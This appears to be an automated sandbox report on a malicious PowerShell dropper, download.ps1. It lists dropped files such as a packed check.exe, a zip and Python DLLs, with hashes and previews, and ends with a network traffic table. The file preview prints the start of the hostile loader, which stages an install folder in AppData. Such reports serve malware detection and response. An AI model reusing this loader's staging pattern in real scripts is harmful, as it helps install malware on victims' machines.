SHA-256:	002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
SHA-512:	7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	5.953784637413928
Encrypted:	false
SSDEEP:	3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
MD5:	10116447F9276F10664BA85A5614BA3A
SHA1:	EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
SHA-256:	C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
SHA-512:	C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\libcrypto-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5232408
Entropy (8bit):	5.940072183736028
Encrypted:	false
SSDEEP:	98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
MD5:	123AD0908C76CCBA4789C084F7A6B8D0
SHA1:	86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
SHA-256:	4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
SHA-512:	80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.\|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...\|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\libssl-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	792856
Entropy (8bit):	5.57949182561317
Encrypted:	false
SSDEEP:	12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
MD5:	4FF168AAA6A1D68E7957175C8513F3A2
SHA1:	782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
SHA-256:	2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
SHA-512:	C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...\|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\psutil\_psutil_windows.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	5.909456553599775
Encrypted:	false
SSDEEP:	1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
MD5:	49AC12A1F10AB93FAFAB064FD0523A63
SHA1:	3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
SHA-256:	BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
SHA-512:	1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..5..5..5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\python3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70416
Entropy (8bit):	6.1258200129869405
Encrypted:	false
SSDEEP:	768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
MD5:	16855EBEF31C5B1EBE767F1C617645B3
SHA1:	315521F3A748ABFA35CD4D48E8DD09D0556D989B
SHA-256:	A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
SHA-512:	C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\python313.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6083856
Entropy (8bit):	6.126922729922386
Encrypted:	false
SSDEEP:	49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
MD5:	B9DE917B925DD246B709BB4233777EFD
SHA1:	775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
SHA-256:	0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
SHA-512:	F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	6.554484610649281
Encrypted:	false
SSDEEP:	384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
MD5:	20831703486869B470006941B4D996F2
SHA1:	28851DFD43706542CD3EF1B88B5E2749562DFEE0
SHA-256:	78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
SHA-512:	4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI55962\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	709904
Entropy (8bit):	5.861739047785334
Encrypted:	false
SSDEEP:	12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
MD5:	0902D299A2A487A7B0C2D75862B13640
SHA1:	04BCBD5A11861A03A0D323A8050A677C3A88BE13
SHA-256:	2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
SHA-512:	8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drm1vimf.54s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxska3ev.3nn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcaq24o2.t0c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmrbd4z3.ee3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7208771259316853
Encrypted:	false
SSDEEP:	96:9KuCmP8oDkvhkvCCtRBZbEr2H9+ZbEn2H9y:9KUP7RBZb+ZLy
MD5:	403B581FECE1361F3DB8A54B14BFEC10
SHA1:	DE92743FA53123FE243C1CADB0B712B7B8E66FB3
SHA-256:	C4815012D66CAFA46C6463B6A26BE4931D4332C74FBEB329DD655AD958070173
SHA-512:	62BE29F45FC5C1E4A63F9102AD9ECFDC752501EC89B80FD473D8A7561E6420F548237FD72E81F423E98F176E1D09EDEDF36875F1EE49198E9C679FE7DEC9DBC0
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ......Yd......TJ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....V.TJ......TJ......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YQ...........................d...A.p.p.D.a.t.a...B.V.1......YU...Roaming.@......EW)B.YU...........................o...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YQ............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YQ...........................-4).W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YQ.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YQ.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YX......0..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCOBC08WZB3IS1G15WND.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7208771259316853
Encrypted:	false
SSDEEP:	96:9KuCmP8oDkvhkvCCtRBZbEr2H9+ZbEn2H9y:9KUP7RBZb+ZLy
MD5:	403B581FECE1361F3DB8A54B14BFEC10
SHA1:	DE92743FA53123FE243C1CADB0B712B7B8E66FB3
SHA-256:	C4815012D66CAFA46C6463B6A26BE4931D4332C74FBEB329DD655AD958070173
SHA-512:	62BE29F45FC5C1E4A63F9102AD9ECFDC752501EC89B80FD473D8A7561E6420F548237FD72E81F423E98F176E1D09EDEDF36875F1EE49198E9C679FE7DEC9DBC0
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ......Yd......TJ..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....V.TJ......TJ......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YQ...........................d...A.p.p.D.a.t.a...B.V.1......YU...Roaming.@......EW)B.YU...........................o...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YQ............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YQ...........................-4).W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YQ.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YQ.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YX......0..........

C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38755410
Entropy (8bit):	7.995839341470473
Encrypted:	true
SSDEEP:	786432:O+gX4BMdhwzTQXR5FbPp6FcSS5U/LT2KzVyPVLBdebXMb8VH/zEa:MXGMK4XR3bLSCU/+6yPl3ebcBa
MD5:	F17797CAAB0F1CB8D5813853AAD786CA
SHA1:	5B67F3D290B2E027EA617F239310BAE47083EE54
SHA-256:	C24D6A9DE8F394854E91A84ECE64E9A5A8FCC8B66E7E67AC47473E5CF709CFDE
SHA-512:	55D1F0217028564189545E9F7ECF8E0B087BABA792F97A3ADD825841C16A1B52368042EF08A1860E726749B4706456EC52236245C3CD8B15545630D8881D80A6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..\.Z\.Z\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z\.Z.\.Zb..[3\.Zb..[+\.ZRich\.Z........PE..d...g.Vg.........."....).....\.................@....................................J.O...`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\nozEdZJe.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	38486075
Entropy (8bit):	7.998262931276649
Encrypted:	true
SSDEEP:	786432:L6ivV/JVTmIg5sc8TcKuWLN4xu5GFsxHF8lhP7TK5yt86iJ/P4h:/vBfKIrc8Tcfrx2GFgF8lhDT4yez4h
MD5:	21786840938E823B9AA236AD8E27FC97
SHA1:	B26CE17507089D5BFEA50DEC8E987E1EE69AC79F
SHA-256:	08BE38EC51A77DE7FB197A79B5E15AD88AF3FC1975A883CD7D316584B4865939
SHA-512:	9C8323CC52762649ED5240F50EEEB2C03237E528BC1F38607D592CC60818A7125C61280096AEA7C810EEA0DF6997447F37C05C6979991FBE7BC8935F767DF397
Malicious:	false
Reputation:	unknown
Preview:	PK........4..Y....?K.R\O.....check.exe.]{`.W...TZ...... ..e...hw.......hh.j...V....c.`...]}IhU...,mQ-.."(Z...s...D..........;.{...d..os.l.:....l%6....._5..o....w.,..w..?........=a.#...=.p...{B.8.....}...yt...bc.I.e..}....:..72.r.M.....?/d..m.sH[~^.n....i....`\8.%...y....\.N...d<.>.3....g...F..6......I[+[=G......m(..o...'N..n...t....-?.3...>..m....A...b=j."....).2..../.[.[V....(...f....?..w.....V9lK..>.C..).zY.`.8..n.mD...F.F"...Y..=..9j..w......s....s..6...x]^+I.....Jy.&N..;..x..R......c..pT].+[4)q..N...j.).cI...F+j.]N[Q.V......A)R....^....n....J(jA.:.2.hhb.R.Ht..............!.._=.rV....;l...j......O.r...W.(..y......Pl[.....l.-ak>u`..)..s!.i..]..)..>.Z..a.e.z7.n..X..C..:&...F.c.....'.H...c.h........3...;.x...]...B.......W.$!J......OJ..@z.U.W..-7..@.7m..^.T..J....D.P.}...).....T.?1..\|8o.Z..S..+*.....e...Y...R.....,...C........u.6.@E..8.nV.@.....w.o.o.o.}e.u..9u...)..(..<UA..?..?1..........SJ3.....b.R.....+.. z..r.....$%.Ot..j..)-.`5R

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372109001361566
Encrypted:	false
SSDEEP:	6144:3FVfpi6ceLP/9skLmb0qyWWSPtaJG8nAge35OlMMhA2AX4WABlguNFiL:1V1cyWWI/glMM6kF7jq
MD5:	CBE9432AD8C2A37EF8CD3F767BB881A5
SHA1:	A9FA30A4C35F08660D3E00CC44E07F81F473519D
SHA-256:	B3F77B9F2B792DCEBBE6E92EEA870AD222145B67319CD2B21BD8A780E04ED8D5
SHA-512:	69479D985C19C5CBD36804B0451F4D921746861961E390B1D45500C38504337016B0C5F6956BF81A46F918690C7F6AC6B5360EE9B521F8369B265B88B4592F01
Malicious:	false
Reputation:	unknown
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..`.UJ................................................................................................................................................................................................................................................................................................................................................w2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	5.998969191023309
TrID:
File name:	download.ps1
File size:	51'316'505 bytes
MD5:	828e0cc3c14385d28606aca4c5edf657
SHA1:	bc962c5c0d31e0e0c13c0c3505a53ec3d3251a25
SHA256:	aef32c3cd1cd6bd44239ca9a75064cfa31fc0d582e33683c1c602559b7e107f8
SHA512:	0b5cc9b5741242da8d5dc053dd50a61d4b9efd308f158978d716c288219aedd34898f59475d3cb845521f34d0dd3df922df280bc1450821872e9cce10a1ef074
SSDEEP:	49152:Mlh6KeiZ9CruD6ch8wsawJRg2bN3oRIeEwd5RifHsfSn6DTIakmcWMlcsTk0bGas:6
TLSH:	F6B73320AEAA6DBE0A6CC33D707F5F1D1BB00FD1844DE1DA47A0B9C7165FB41562B829
File Content Preview:	${random_error_action_preference}="Stop";Set-Location $Env:AppData;${random_install_path}="$Env:AppData\kbHYWyel";if(Test-Path ${random_install_path}){if(Test-Path "$Env:AppData\VdfJrgVq.txt"){Remove-Item "$Env:AppData\VdfJrgVq.txt"};Exit};$domain=(Get-Wm

File Icon


Icon Hash:	3270d6baae77db44

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 17:11:33.311920881 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:33.311954021 CET	443	49712	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:33.312066078 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:33.312926054 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:33.312942028 CET	443	49712	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:34.615803957 CET	443	49712	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:34.630537987 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:34.630562067 CET	443	49712	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:34.632226944 CET	443	49712	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:34.632333994 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:34.652818918 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:34.653145075 CET	443	49712	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:34.653250933 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:34.656131983 CET	49712	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:49.439023018 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:49.439065933 CET	443	49718	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:49.439155102 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:49.439971924 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:49.439982891 CET	443	49718	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:50.708775043 CET	443	49718	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:50.709450960 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:50.709491968 CET	443	49718	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:50.710625887 CET	443	49718	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:50.710695982 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:50.712347984 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:50.712522984 CET	443	49718	104.20.22.46	192.168.2.8
Dec 9, 2024 17:11:50.712568045 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:50.712760925 CET	49718	443	192.168.2.8	104.20.22.46
Dec 9, 2024 17:11:57.915780067 CET	49722	443	192.168.2.8	104.20.22.46
